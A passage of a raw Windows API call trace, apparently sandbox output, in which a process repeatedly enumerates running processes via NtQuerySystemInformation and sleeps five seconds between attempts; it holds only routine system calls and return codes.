RegionSize=0xdea54*=0x20000) returned 0x0 [0273.995] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0274.000] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0274.001] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0274.002] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0274.002] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0274.003] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0274.004] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0274.004] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0274.009] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0274.010] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0274.012] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0274.012] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0274.013] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0274.013] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0274.013] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0274.019] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0274.019] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0274.021] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0274.022] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0274.022] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0274.023] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0274.023] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0274.028] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0274.030] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0274.031] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0274.031] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0274.032] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0274.032] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0274.033] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0274.037] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0274.040] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0274.041] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0274.042] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0274.042] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0274.043] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0274.043] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0274.048] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0274.049] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0274.051] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0274.051] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0274.052] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0274.052] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0274.052] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0274.057] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0274.058] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0274.060] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0274.060] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0274.061] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0274.061] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0274.061] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0274.066] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0274.067] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0274.069] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0274.069] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0274.070] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0274.070] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0274.071] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0274.077] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0274.078] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0274.079] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0274.079] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0274.080] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0274.080] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0274.081] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0274.085] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0274.086] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0274.087] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0274.088] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0274.088] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0274.089] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0274.089] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0274.094] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0274.095] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0274.096] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0274.096] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0274.097] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0274.097] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0274.098] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0274.103] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0274.104] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0274.105] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0274.105] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0274.106] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0274.107] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0274.107] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0274.112] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0274.113] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0274.115] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0274.115] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0274.116] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0274.116] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0274.116] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0274.121] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0274.122] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0274.124] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0274.125] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0274.125] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0274.126] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0274.126] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0274.131] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0274.132] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0274.133] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0274.134] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0274.134] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0274.135] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0274.135] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0274.142] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0274.143] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0274.144] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0274.144] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0274.145] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0274.146] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0274.146] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0274.151] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0274.152] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0274.153] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0274.154] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0274.155] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0274.155] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0274.155] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0274.162] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0274.163] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0274.165] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0274.165] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0274.166] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0274.167] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0274.167] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0274.172] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0274.174] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0274.176] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0274.176] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0274.177] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0274.177] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0274.178] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0274.183] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0274.184] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0274.186] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0274.186] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0274.187] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0274.187] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0274.188] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0274.193] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0274.194] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0274.196] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0274.196] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0274.197] 